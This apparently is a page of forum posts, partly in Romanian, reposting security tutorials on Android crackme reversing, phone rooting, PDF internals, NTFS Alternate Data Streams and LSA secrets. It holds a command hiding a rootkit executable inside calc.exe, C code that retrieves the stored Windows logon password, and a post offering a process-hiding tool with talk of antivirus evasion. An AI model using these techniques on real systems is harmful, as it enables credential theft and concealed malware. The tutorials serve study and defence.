61 const/16 v23, 0x6 62 move-object v0, v6 63 move/from16 v1, v22 64 move/from16 v2, v23 65 invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String; 66 67 //Converting them to integer and xoring - Serial part2 68 invoke-static/range {v19 .. v19}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 69 move-result v22 70 invoke-static/range {v20 .. v20}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 71 move-result v23 72 xor-int v22, v22, v23 73 74 //Making a new StringBuilder object and formatting the string to part1-part2-part3 75 new-instance v22, Ljava/lang/StringBuilder; 76 invoke-static {v12}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String; 77 move-result-object v23 78 invoke-direct/range {v22 .. v23}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V 79 const-string v23, "-" 80 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 81 move-result-object v22 82 invoke-static/range {v17 .. v18}, Ljava/lang/String;->valueOf(J)Ljava/lang/String; 83 move-result-object v23 84 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 85 move-result-object v22 86 const-string v23, "-" 87 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 88 move-result-object v22 89 move-object/from16 v0, v22 90 move-object/from16 v1, v19 91 invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 92 move-result-object v22 93 94 //Checking whether user entered serial and program made serials are equal. 95 invoke-virtual {v14, v15}, Ljava/lang/String;->equals(Ljava/lang/Object;) As you can see, the algorithm is pretty straight forward. It is using name and two hardware ids as input and doing some operations on them to make a serial. We can easily recode it in any programming language we prefer to make it as a keygen. Anyway, I am not posting any keygen sources as it will spoil the whole phun! Decoding the Algorithm A demonstrative serial calculation routine is given below: Name: aaaaa HW ID1: 0000000000000000 HW ID2: 89014103211118510720 Here are stepwise instructions on generating final serial number At first 'aaaaa' will be converted to '9797979797', from which we will take first 5 letters and convert it into integer 97979 This will be xored with 0x6B016 resulting 511661 and this will be first part of serial. For second part, we will take first 6 letters from HW ID1 and HW ID2, convert them to integer and xor, resulting 000000^890141 = 890141. For third part we will use first 6 characters from HW ID1. Formatting with the specified delimiter the serial will become '511661-890141-000000'. Final Verification of Reversing Now we will put the same magic number into our Crackme application. Bingo! everything worked as expected. Now, for all those who thinks it is pretty hard to read all those disassembled instructions and manually converting them to higher language constructs, there are other options. As dalvik is based on design of Java, it is also susceptible to decompilation. There is no decompiler available at this moment, but there is hope. For now we can use another utility which converts dex files to jar files so that we can use Java decompilers to see much more abstracted code. From starting of this blog post you may have noticed the tool dex2jar. Use dex2jar dex2jar - A tool for converting Android's .dex format to Java's .class format - Google Project Hosting to convert classes.dex to classes.dex.dex2jar.jar. Open it in a Java decompiler and you can see much better output than dalvik disassembly. Please note that dex2jar is still in development phase and the output is meaningless at many places. This should be used only to get a quick understanding of all the functions. Conclusion In this introductory article, Dhanesh explains reversing Andriod using the emulator and all available tools in sequence with pictorial elaborative steps. It is mainly based to set up your ground for further reversing work on Andriod Platform. Well, thats it! We have analyzed an Android program and defeated its protection. Cheerio!
  20. me.mello
    Eu zic ca daca tot are poze, merita citit... Author: Dangwal Introduction In this exciting tutorial Dangwal explains how he has rooted (Jail-breaking in Apple world) HTC wildfire to get rid of old Android 2.2.1 to install latest Android 2.3 version. Here is the fun game in his own words with beautiful illustrations. Sometime ago I got an HTC Wildfire and was having loads of fun using it, but every time I wanted to do anything more "creative" i was stopped by the binded nature of phone, hence i decided to root it (jailbreak it apple fellas) and get complete control over my device. Here, I am covering step by step guide to root HTC wildfire 2.2.1 and install Android 2.3 on HTC Wildfire. To do the rooting you must have your Wildfire with S-OFF, HBOOT 1.02.0002 and Android 2.2.1 . You can check it by booting into HBOOT (power on your phone by holding the VOLUME DOWN + POWER button) .This method is strictly for the 2.2.1 owners. How you can turn the S-OFF is your headache, you can try the alpharev (ask the team if they can get you a 2.0 test version... ) or you can wait for Unrevoked 3.33 or you can straight off go to market and hunt for XTC clip. Either way, try it and don't attempt to anything before you get S-OFF. Actually the notorious S-ON flag is the cause rooting wildfire is such a pain in the a**. Before & After the "Root HTC & Run Android Game" Before I had this one (HTC Wildfire with Android 2.2.1) After this game, I converted it to like this with latest Android 2.3 or better Disclaimer This tutorial is intended for educational purposes only and the author or the publisher or this site can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial. In any case you disagree with the above statement, please stop here. Requirements Before we begin, you need following things in place, HTC wildfire with S-OFF , HBOOT 1.01.0002 , OS Froyo 2.2.1 USB Drivers: http://downloads.unrevoked.com/recovery/android-usb-driver.zip RUU Rom 2.1/RUU_Buzz_HTC_WWE_1.14.405.2_R_Radio_13.45.55.24_3.35.15.31_release_130814_signed:Shipped ROMs Unrevoked 3.2 Test version: unrEVOked-3-2-Windoze.exe - download now for free. File sharing. Software file sharing. Free file hosting. File upload. FileFactory.com Cyanogenmod 7: http://download.cyanogenmod.com/get/update-cm-7.0.0-buzz-signed.zip and Google Apps: http://android.d3xt3r01.tk/cyanogen/gapps/gapps-gb-20110307-signed.zip Time and Patience & last but not the least, Balls of Steel Starting with 'Root HTC & Run Android Game' Once the ground is set, we can now move on to step by step instructions with illustrations to finally root on HTC and get latest Android 2.3 on it. Step 1 - Installing the USB drivers Download USB drivers and extract them on desktop. Turn off your wildfire and boot into HBOOT by holding the VOLUME DOWN + POWER button. Connect your phone to your PC and it will show "drivers installing" or similar there for Android device. When prompted , install the drivers by going to device manager and browsing to the folder where you extracted the drivers. Once installed, disconnect and reboot your phone normally. Now you need to install the Android bootloader interface. Connect it to your HTC wildfire to the PC and it will ask for drivers again, Now go to device manager, click on unknown device, click on update driver -> install from specific location -> No i will choose to install -> choose Android phone and click on adb interface -> click next -> when asked to install click on continue anyway, just install them. Once done you will see your phone recognized as "Android bootloader interface". Now disconnect your phone and go into settings -> applications - > development - > enable USB Debugging. Congratulations, the first step is completed now. Step 2 - Downgrading from Android 2.2.1 Froyo to Android 2.1 Eclair Download the RUU rom which is an original stock rom. Plug your phone into the PC and set it to "Charge through USB". Double click RUU rom .exe. Follow the on screen instructions and then let it install. Your phone will reboot into stock HTC 2.1 This will be the last time you will be seeing it though. The HBOOT version will be now 0.80.0002 (check it by powering on your phone by holding the VOLUME DOWN + POWER button). Once done disconnect your phone. Step 3 - Gaining root using UnrEVOked Download the test version of unrevoked. Let me repeat, DO NOT USE UNREVOKED 3.32 as it will lead to CID errors or to be precise this error "validation error backup cid is missing" This may be caused as the 3.32 doesnot support HBOOT 0.82.0002. Hence You need specific test version of Unrevoked 3.2 to do the job. Download it, save it on desktop, and run it. Now connect your phone and the rooting will start. Once donw, you will have Clockworkmod recovery installed on your phone. Reboot your phone now (using the VOLUME UP/DOWN key for navigation and clicking using TRACKBALL, the POWER button takes you back in menus). Once rebooted, you will see the superuserapp in your phone and congratulations, your phone is successfully rooted Step 4 - Installing Cyanogenmod 7 or Android Gingerbread 2.3.3 Download the Cyanogenmod 7 with google apps and save it on desktop, connect your phone as USB diskdrive and transfer both zip files on SD card. Once done, reboot your phone into ClockworkMod Recovery (booting by holding the VOLUME DOWN + POWER button and clicking on recovery) Once the device boots into the ClockworkMod Recovery, use the side VOLUME buttons to move around, and either the POWER button or the TRACKBALL to select. Select the option to Wipe data/factory reset. Then select the option to Wipe cache partition. Select Install zip from sdcard. Select Choose zip from sdcard. Choose update-cm-7.0.0-buzz-signed.zip & Let it install. Once done, Select Install zip from sdcard. Select Choose zip from sdcard, choose gapps-gb-20110307-signed.zip Once the installation has finished, to get back to the main menu by clicking the POWER button and select the Reboot system now option Congratulations ! Now your HTC Wildfire should now boot into CyanogenMod as shown in screen below. Finally r00ted Acknowledgements Special thanks to 3xeno. Greetz fly to Singla | Parul | Nilesh | Satwik Bhai | Broken Angel | Rahul Bhai Deci ati inteles ceva?? mai cititi odata.
  21. me.mello
    Off: Eu sunt @IceyJoke kw mi-a schimbat numele ca asa l-am rugat. Da @paul cu asta ma ocup,imi place sa programez windows si atat. Si da asa este im cer scuze @staticwater, am intarziat ca am facut un topic cu pdf si a durat ceva timp, uitati un link aici....e printre primele versiuni asta a fost facuta pentru rst sa ii arat lui nytro ca nu sunt oarecare de vorbesc aiurea....long story Nu are multe functii am sters din ele l-am lasat cat sa ascunda un process: explorer.exe Acum trebuie sa mentiunez versiunea asta....numai e buna de nimic pentru mine(am alta), chiar si asa codul sursa nu il dau...prea mula futere de creier pentru el. cu toate astea e detectat cam de toate av's cu tot felu de nume care m-a facut sa rad prima data:)) Desi e detectat, el tot isi face treaba. Cand deschideti aplicatia, ea va ascunde explorer.exe, cand o inchideti [X] ea va readuce explorer.exe in task manager...sau oricare altul, nu contine niciun fel de virus sau orice altceva inafara de STRICT ce am zis eu ca face. GirlShare - Download Sev7n.Sins.exe have fun Habar nu am pe ce mai merge pe xp sp3 acum l-am testat merge tipla. Nu vreau pm-uri cu datimi sursa va rog ca ajung la disperare. Pun threaduri sa invatati ceva...puteti cere sfaturi nu mura in gura!!!
  22. me.mello
    Author: Anand Pare mult de citit dar nu e, o sa treaca repede timpul. Introduction Portable Document Format (PDF) is a file format for representing documents in a manner independent of the application software, hardware, and operating system used to create them and of the output device on which they are to be displayed or printed. In this introductory article I will explain the internals of PDF document, its structures and components with examples and screenshots. It will help you understand intrinsics of PDF document and will be more useful if you are into PDF malware analysis. Components of PDF File PDF syntax consists of four main components: 1. Objects 2. File Structure 3. Document Structure 4. Content Stream PDF Objects A PDF file consists primarily of objects, of which there are eight types: 1. Boolean values, representing true or false 2. Numbers include integer and real 3. Strings 4. Names 5. Arrays, ordered collections of objects 6. Dictionaries, collections of objects indexed by Names 7. Streams, usually containing large amounts of data 8. The null object denoted by keyword null I will explain more details about each of these objects in detail in the following section. PDF Objects -> Strings String objects can be represented in two ways: Literal Strings Hexadecimal Strings Literal Strings consists of any number of characters between opening and closing parenthesis. Example (This is a string objects) If string is too long then it can be represented using backslash as shown below (This is a very long\ String.) Hexadecimal Strings consists of hexadecimal character enclose with angel bracket Example: <A0C1D2E3F1> Here each pair of hexadecimal defines one byte of string. PDF Objects -> Names A names object is uniquely defined by sequence of characters. Slash character(/) defined a name. Example /secsavvy /SecSavvy Both are different name. /Sec#20Savvy mean Sec Savvy 20 is hexadecimal value for white space. Note: Pdf is case-sensitive. PDF Objects -> Array An array object is collection of objects. PDF array object can be heterogeneous. It is defined with square brackets. Example [1 (string) /Name 3.14] PDF Objects -> Dictionary Dictionary object consists of pairs of objects. The first element is key and the second is value. The key must be name. A dictionary is written as a sequence of key-value pairs enclosed in double angle brackets (<< ? >>). Example << /Type /Pages /Kids [ 4 0 R ] /Count 1 >> Count is a key and 1 is value. PDF Objects -> Streams A stream object, like a string object, is a sequence of bytes. Stream can be of unlimited length, whereas a string is subject to an implementation limit. For this reason, objects with potentially large amounts of data, such as images and page descriptions, are represented as streams. A stream consists of a dictionary followed by zero or more bytes bracketed between the keywords stream and endstream: dictionary stream ... Zero or more bytes ... endstream PDF Objects -> Indirect Ones Objects may be labeled so that they can be referred to by other objects. A labeled object is called an indirect object. Example Consider this object obj and endobj is a keyword. 10 0 obj (SecSavvy String) endobj This object defined a string of object number 10. This object can be referred in a file by indirect reference as 10 0 R PDF Objects -> Streams -> Filters A filter is an optional part of the specification of a stream, indicating how the data in the stream must be decoded before it is used. For example, if a stream has an ASCIIHexDecode filter, an application reading the data in that stream will transform the ASCII hexadecimal-encoded data in the stream into binary data. For data encoded using LZW and ASCII base-85 encoding (in that order) can be decoded using the following entry in the stream dictionary: /Filter [ /ASCII85Decode /LZWDecode ] Example 1 0 obj << /Length 534 /Filter [ /ASCII85Decode /LZWDecode ]>> stream J..)6T`?p&<!J9%_[umg"B7/Z7KNXbN'S+,*Q/&"OLT'FLIDK#!n`$"<Atdi`\Vn%b%)&'cA*VnK\CJY(sF>c!Jnl@RM]WM;jjH6Gnc75idkL5]+cPZKEBPWdR>FF(kj1_R%W_d&/jS!;iuad7h?[L-F$+]]0A3Ck*$I0KZ?;<)CJtqi65XbVc3\n5ua:Q/=0$W<#N3U;H,MQKqfg1?:lUpR;6oN[C2E4ZNr8Udn.'p+?#X+1>0Kuk$bCDF/(3fL5]Oq)^kJZ!C2H1'TO]Rl?Q:&?<5&iP!$Rq;BXRecDN[iJB`,)o8XJOSJ9sDS]hQ;Rj@!ND)bD_q&C\g:inYC%)&u#:u,M6Bm%IY!Kb1+?:aAa?S`ViJglLb8<W9k6Yl\\0McJQkDeLWdPN?9A?jX*al>iG1p&i;eVoK&juJHs9%;Xomop?5KatWRT?JQ#qYuL,JD?M$0QP)lKn06l1apKDC@\qJ4B!!(5m+j.7F790m(Vj88l8Q:_CZ(Gm1%X\N1&u!FKHMB~> endstream endobj Here is the list of standard filters ASCIIHexDecode ASCII85Decode LZWDecode FlateDecode RunLengthDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode Crypt File Structure PDF file consists of 4 main elements: PDF header identifying the PDF specification. A body containing the objects that make up the document contained in the file A cross-reference table containing information about the indirect objects in the file A trailer giving the location of the cross-reference table and of certain special objects within the body of the file. Cross Reference Table The cross-reference table contains information that permits random access to indirect objects within the file so that the entire file need not be read to locate any particular object. The table contains a one-line entry for each indirect object, specifying the location of that object within the body of the file. Each cross-reference section begins with a line containing the keyword xref. Following this line are one or more cross-reference subsections, which may appear in any order. Each cross-reference subsection contains entries for a contiguous range of object numbers. The subsection begins with a line containing two numbers separated by a space: the object number of the first object in this subsection and the number of entries in the subsection. For example, the line 0 8 introduces a subsection containing five objects numbered consecutively from 0 to 8. xref 0 8 0000000000 65535 f 0000000009 00000 n 0000000074 00000 n 0000000120 00000 n 0000000179 00000 n 0000000364 00000 n 0000000466 00000 n 0000000496 00000 n 0000000009 is 10 digit byte offset in the case of in-use entry , giving the number of bytes from the beginning of the file to the beginning of the object. 0000000000 is the 10-digit object number of the next free object int the case of free entry Example Screenshots: Simple Hello World Text PDF Here are the series of screenshots which shows different parts of sample PDF document. Conclusion his article explains in brief internals of PDF document, its structures, components with examples and detailed screenshots. Hope this article http://www.aiim.org/documents/standards/PDF-Ref/References/Adobe/PDFReference17.pdf will help you in the malware research work revolviing around PDF documents. Though it is enough for beginners but advanced users are advised read through reference white paper for more granular details.
  23. me.mello
    Static te contrazic, eu zici sa imi citesti topicul despte data stream ca sa intelegi cam care e treaba de rootki's. Si hai sati mai spun o chestie despre processele inviziblie, am un program facut de mine care desi e acum e detectat de av's inca ascunde procesele asa de bine incat nimic nu le detecteaza am testat cu n-unelte, deci nu poti spune ca detecteaza orice metoda, mai sunt is altele care la fel.... Metode ar fi sa faci bypass la av's, citisem un articol care era cam slab facut...oricum omul explica cat de cat clar, cum foloseste el CreateProcess CreateRemoteThread si MoveMemory sa faca toate astea. Oricum parerea mea , raman tot la ideea ca daca ascund bine procesul, dau free la dll care n-am ce face cu el, ma mai folosesc si de NTFS data stream (ADS) daca e nevoie fac si ceva multithreading, un pic de ACL/DACL nu ai ce sa-i faci. Bine faza cu multithread si free .dll nici nu e nevoie atat cat le ai in data streaming ACL/DACL Bineinteles varianta scurta tot un crypter ramane;)) Sa ma contraziceti va rog daca nu am dreptate numai tin minte sigur, insa MCafe cum scaneaza arhivele parolate??
  24. me.mello
    What is an Alternate Data Stream (ADS)? Alternate Data Stream (ADS) is the lesser known feature of Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. Any such stream associated with file/folder is not visible when viewed through conventional utilities such as Windows Explorer or DIR command or any other file browser tools. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. Due to this hidden nature of ADS, hackers have been exploiting this method to secretly store their Rootkit components on the compromised system without being detected. For example, the infamous Rootkit named 'Mailbot.AZ' aka 'Backdoor.Rustock.A' used to hide its driver file into system32 folder (C:\Windows\system32) as a stream '18467'. Playing with ADS It is easy to create alternate data streams for the file or folder. Here are the simple commands (use the cmd prompt to launch these commands) Create simple text stream, type c:\test.txt > c:\windows\system32\calc.exe:test.txt View it using the notepad c:\notepad.exe c:\windows\system32\calc.exe:test.txt Hiding the rootkit.exe as stream within the windows calculator, type c:\rootkit.exe > c:\windows\system32\calc.exe:rootkit.exe' Here is the screenshot showing the above steps in execution. Note that there is no change in the size of calc.exe even after adding the stream file to it. These characteristics makes the streams a hidden threat. Program to Enumerate Streams Here is the short demo program which enumerates all the streams within the given file or folder. void EnumStreams(char *strFilePath) { PVOID streamContext = 0; DWORD dwReadBytes, seek_high; WIN32_STREAM_ID streamHeader; WCHAR strStreamName[MAX_PATH]; char strBuffer[1024]; //Open the file for stream enumeration HANDLE hFile = CreateFileA( strFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL ); if( hFile == INVALID_HANDLE_VALUE ) { printf("Failed to open the file %s, Error=0x%.8x", strFilePath, GetLastError()); return; } while(1) { //check if we have reached the end of file if( FALSE == BackupRead(hFile, (LPBYTE)&streamHeader, (LPBYTE)&streamHeader.cStreamName-(LPBYTE)&streamHeader, &dwReadBytes, FALSE, FALSE, &streamContext) ) { break; } //check if we have read the stream header properly if( (long)dwReadBytes != (LPBYTE)&streamHeader.cStreamName-(LPBYTE)&streamHeader ) break; //we are interested only in alternate data streams if(streamHeader.dwStreamId == BACKUP_ALTERNATE_DATA) { if (streamHeader.wStreamNameSize != 0 ) { if( BackupRead(hFile, (LPBYTE)strStreamName, streamHeader.dwStreamNameSize, &dwReadBytes, FALSE, FALSE, &streamContext) ) { strStreamName[streamHeader.dwStreamNameSize/2]=L'\0'; // //Reformat the stream file name ... :stream.txt:$DATA // sprintf_s(strBuffer, 1024, "%S", &strStreamName[1]); char *ptr = strchr(strBuffer, ':'); if( ptr != NULL ) *ptr = '\0'; printf("\n Found Stream - %s", strBuffer); } } } // jump to the next stream header if (BackupSeek(hFile, ~0, ~0, &dwReadBytes, &seek_high, &streamContext) == FALSE) { //for any errors other than seek break out of loop if (GetLastError() != ERROR_SEEK) { // terminate BackupRead() loop BackupRead(hFile, 0, 0, &dwReadBytes, TRUE, FALSE, &streamContext); break; } streamHeader.Size.QuadPart -= dwReadBytes; streamHeader.Size.HighPart -= seek_high; BYTE buffer[4096]; while(streamHeader.Size.QuadPart > 0) { if (dwReadBytes!=sizeof(buffer) || !BackupRead(hFile, buffer, sizeof(buffer), &dwReadBytes, FALSE, FALSE, &streamContext) ) { break; } streamHeader.Size.QuadPart -= dwReadBytes; } //end of inner while loop } //end of 'jump to next stream' if loop } //main while loop //Finally clean up the buffers used for seeking if (streamContext) BackupRead(hFile, 0, 0, &dwReadBytes, TRUE, FALSE, &streamContext); CloseHandle(hFile); return; } Above program initially opens the input file using the FILE_FLAG_BACKUP_SEMANTICS for reading streams. Next it calls the BackupRead function to read the stream header. If the header contains the flag BACKUP_ALTERNATE_DATA then it points to a hidden stream file. In such a case it proceeds to reading the stream file name which is present after the stream header. After that it moves file pointer to next stream header through BackupSeek function. The same process is repeated until all streams present in the specified files are discovered. Also note that the same program can be used to detect streams within folder as well. Well Known Alternate Data Streams There are numerous applications including Windows which internally use alternate data streams for various purposes. Here are some of the well known streams * SummaryInformation This stream is created by Windows when user updates the summary information for the file. * DocumentSummaryInformation This stream is created by Windows when user updates the summary information for the file. * {4c8cc155-6c1e-11d1-8e41-00c04fb9386d} This is stream with zero size created by Windows when user updates the summary information for the file. * Zone.Identifier This is another well known stream created by Internet Explorer for every downloaded file. It is basically text stream with size normally less than 50 bytes. * encryptable This is a stream with zero size attached to the file 'Thumbs.db'. * favicon This is icon stream attached to the favorite links stored by Internet Explorer. * AFP_AfpInfo This is stream of icon type belongs to Macintosh system. In addition to legitimate programs, it is also being used by malicious Rootkit programs such as Mailbot.AZ, Trojan.Win32.Agent.alt etc to hide their drivers. Conclusion n short, ADS not only makes it easy for Rootkit programs to hide themseleves but also provides the covert launch pad to execute stealthily without making noise. Only sophisticated tools such as StreamArmor will greatly help in uncovering and destroying such hidden threats.
  25. me.mello
    Introduction Windows provides Security Management functions for managing various Windows secrets. One such function is LsaRetrievePrivateData which retrieves various secret data from system policy that has been previously stored using the function LsaStorePrivateData. One of the secret data stored by this function is the 'DefaultPassword'. All this secret information is stored in the encrypted format at system location in the registry. Normally these registry keys are not visible even if you run regedit as administrator. You need to use any of the techniques as described in this article http://rstcenter.com/forum/36405-discovering-hidden-registry-keys-windows.rst#post246503 to view these secret keys. Here is the screenshot of Regedit.exe running under system account showing the 'DefaultPassword' secret key. There are lot of other Lsa secret strings which are present at below registry location HKEY_LOCAL_MACHINE\Security\Policy\Secrets Using LsaRetrievePrivateData to get 'DefaultPassword' We don't have to manually decrypt this 'DefaultPassword' value from the registry to get the clear text password. The LsaRetrievePrivateData function does it in style without much work. Here is the code snippet which illustrates how to use LsaRetrievePrivateData to retrieve the default logon password. Before we begin, we need to open a handle to LSA policy. //Open the handle to LSA Policy if( LsaOpenPolicy(NULL, &ObjAttributes, POLICY_ALL_ACCESS, &hLsaPolicy) != STATUS_SUCCESS ) { printf("\n LsaOpenPolicy failed"); return; } Once the handle is opened, proceed to retrieve the default password by directly invoking function LsaRetrievePrivateData PLSA_UNICODE_STRING privateData = NULL; WCHAR wstrKeyName[]=L"DefaultPassword"; LSA_UNICODE_STRING keyName; keyName.Buffer = wstrKeyName; keyName.Length = wcslen(wstrKeyName) * sizeof(WCHAR); keyName.MaximumLength = (wcslen(wstrKeyName) + 1) * sizeof(WCHAR); if( LsaRetrievePrivateData(hLsaPolicy, &keyName, &privateData) != STATUS_SUCCESS) { printf("LsaRetrievePrivateData failed"); return; } On successful execution, display the retrieved default password and close the handle printf("\n Success : default password is %S (%d)", privateData->Buffer, privateData->Length); LsaClose(hLsaPolicy); This is straightforward code to get the 'defaultpassword'. Also note that you need to have administrator privileges for this code to execute successfully. Conclusion Though this method is deprecated since XP onwards it still works even on Windows 7. However it is not necessarily have to be current logon user password as there is only one 'DefaultPassword' setting for entire system. Also its not clear under what conditions this password get saved and what password gets stored. Though its not reliable method for applications to get the logon password, it may get you the right password sometimes. Referinte: Security Management functions :Security Management Functions (Windows) MSDN - LsaRetrievePrivateData API Function: LsaRetrievePrivateData Function (Windows)
×
×
  • Create New...